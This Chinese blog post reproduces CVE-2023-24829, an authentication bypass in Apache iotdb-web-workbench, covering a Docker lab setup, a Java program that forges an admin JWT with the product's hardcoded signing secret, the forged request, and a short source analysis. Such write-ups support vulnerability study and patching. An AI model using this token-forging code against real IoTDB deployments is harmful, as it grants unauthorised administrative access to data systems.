Apache iotdb-web-workbench 认证绕过漏洞(CVE-2023-24829)

奋斗吧
奋斗吧
擅长邻域:未填写

标签: Apache iotdb-web-workbench 认证绕过漏洞(CVE-2023-24829) 博客 51CTO博客

2023-03-30 18:23:19 133浏览

Apache iotdb-web-workbench 认证绕过漏洞(CVE-2023-24829),漏洞主要来自于iotdb-web-workbench​IoTDB-Workbench是IoTDB的可视化管理工具,可对IoTDB的数据进行增删改查、权限控制等,简化IoTDB的使用及学习成本。iotdb-web-workbench​中存在不正确的身份验证漏洞。

漏洞简介

  

Apache iotdb-web-workbench 认证绕过漏洞(CVE-2023-24829)_apache

  影响版本 0.13.0 <= 漏洞版本 < 0.13.3

 iotdb-web-workbench IoTDB-Workbench是IoTDB的可视化管理工具,可对IoTDB的数据进行增删改查、权限控制等,简化IoTDB的使用及学习成本。iotdb-web-workbench 中存在不正确的身份验证漏洞。

环境搭建

  我们发现在 Releases 中已经删除到只剩最新版本,所以我们从 commits 中查找历史提交记录来搭建环境。

  

Apache iotdb-web-workbench 认证绕过漏洞(CVE-2023-24829)_CVE-2023-24829_02

  

Apache iotdb-web-workbench 认证绕过漏洞(CVE-2023-24829)_apache_03

  下载下历史版本的源码,下载之后利用 docker 搭建环境。

 docker-compose.yml 将其中挂载数据库文件修改为:

volumes:
      - ./backend/src/main/resources/sqlite/iotdb.db:/sqlite/iotdb.db

 docker-compose up -d 虽然镜像编译成功,但是执行后一直启动不成功,通过 docker logs 查看日志信息。

  

Apache iotdb-web-workbench 认证绕过漏洞(CVE-2023-24829)_漏洞分析_04

 backend 执行 mvn package 编译 jar 。 默认情况下都是依赖于 aliyunmaven 但是很奇怪这次编译时会提示无法从 aliyun 中下载文件,所以将 maven 的 settings.xml 配置文件关于 aliyun 的相关依赖注释掉,就可以编译成功。

帮助网安学习,全套资料S信免费领取:

① 网安学习成长路径思维导图

② 60+网安经典常用工具包

③ 100+SRC分析报告

④ 150+网安实战技术电子书

⑤ 最权威CISSP 认证考试指南+题库

⑥ 超1800页CTF实战技巧手册

⑦ 最新网安大厂面试题合集(含答案)

⑧ APP客户端安全检测指南(安卓+IOS)

 docker-compose.yml,下载的仍然是有问题的镜像,没有去调用编译本地的镜像。

  

Apache iotdb-web-workbench 认证绕过漏洞(CVE-2023-24829)_漏洞分析_05

 backend 目录下 修改 Dockerfile 文件 删除掉 "${JAVA_MEM_OPTS}"

 docker build -t test:v1 . 编译镜像。

  

Apache iotdb-web-workbench 认证绕过漏洞(CVE-2023-24829)_apache_06

 docker-compose.yml 中的 apache/iotdb-web-workbench:0.13.0-backend 替换为 test:v1

 docker-compose up -d

  

Apache iotdb-web-workbench 认证绕过漏洞(CVE-2023-24829)_漏洞复现_07

 http://127.0.0.1:8081/#/login

  

Apache iotdb-web-workbench 认证绕过漏洞(CVE-2023-24829)_漏洞分析_08

  环境如此就搭建好了,但是在实际中利用的话,还是建议不要使用 docker ,而是单独编译前端后端。

漏洞复现

  构造数据包请求保存用户时

  

Apache iotdb-web-workbench 认证绕过漏洞(CVE-2023-24829)_漏洞分析_09

  提示没有登录。

  创建一个 java 项目:

import io.jsonwebtoken.Jwts;
import io.jsonwebtoken.SignatureAlgorithm;

import java.util.Date;

public class iotdb_CreateToken {

    private static String secret =
            "HSyJ0eXAiOiJKV1QasdfffffffSd3g8923402347523fffasdfasgwaegwaegawegawegawegawetwgewagagew"
                    + "asdf23r23DEEasdfawef134t2fawt2g325gafasdfasdfiLCJhbGciOiJIUzI1NiJ9";
    public static String generateToken(String username) {
        Date now = new Date();
        //    Calendar instance = Calendar.getInstance();
        //    instance.add(Calendar.HOUR_OF_DAY, 24);
        Date expireDate = new Date(new Date().getTime() + (1000 * 60 * 60 * 10));
        return Jwts.builder()
                .setHeaderParam("type", "JWT")
                .setSubject(0 + "")
                .setIssuedAt(now) // 签发时间
                .claim("userId", 1)
                .claim("name", username)
                .setExpiration(expireDate) // 过期时间
                .signWith(SignatureAlgorithm.HS512, secret)
                .compact();
    }

    public static void main(String[] args) {
        String token = generateToken("admin");
        System.out.println(token);
    }
}

  

Apache iotdb-web-workbench 认证绕过漏洞(CVE-2023-24829)_漏洞分析_10

  将生成的 Token 加入到之前的数据包中。

  

Apache iotdb-web-workbench 认证绕过漏洞(CVE-2023-24829)_apache_11

  创建用户成功,尝试登录。

POST /api/login?name=test&password=123456 HTTP/1.1
Host: 127.0.0.1:8081
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/json
Content-Length: 4

{
}

  

Apache iotdb-web-workbench 认证绕过漏洞(CVE-2023-24829)_漏洞复现_12

  登录成功。

漏洞分析

  org.apache.iotdb.admin.filter.TokenFilter#preHandle

  

Apache iotdb-web-workbench 认证绕过漏洞(CVE-2023-24829)_漏洞分析_13

 TokenFilter 中 JJwtTool.getClaimsByToken(authorization); 从请求头中获取 token 并解析匹配

  org.apache.iotdb.admin.controller.UserController#login

  

Apache iotdb-web-workbench 认证绕过漏洞(CVE-2023-24829)_CVE-2023-24829_14

 JJwtTool.generateToken(user)

  org.apache.iotdb.admin.tool.JJwtTool#generateToken

  

Apache iotdb-web-workbench 认证绕过漏洞(CVE-2023-24829)_CVE-2023-24829_15

  生成 Token 的相关参数均是可控的,所以我们可以自己构造。

好博客就要一起分享哦!分享海报

此处可发布评论

评论(0展开评论

暂无评论,快来写一下吧

展开评论

客服QQ 1913284695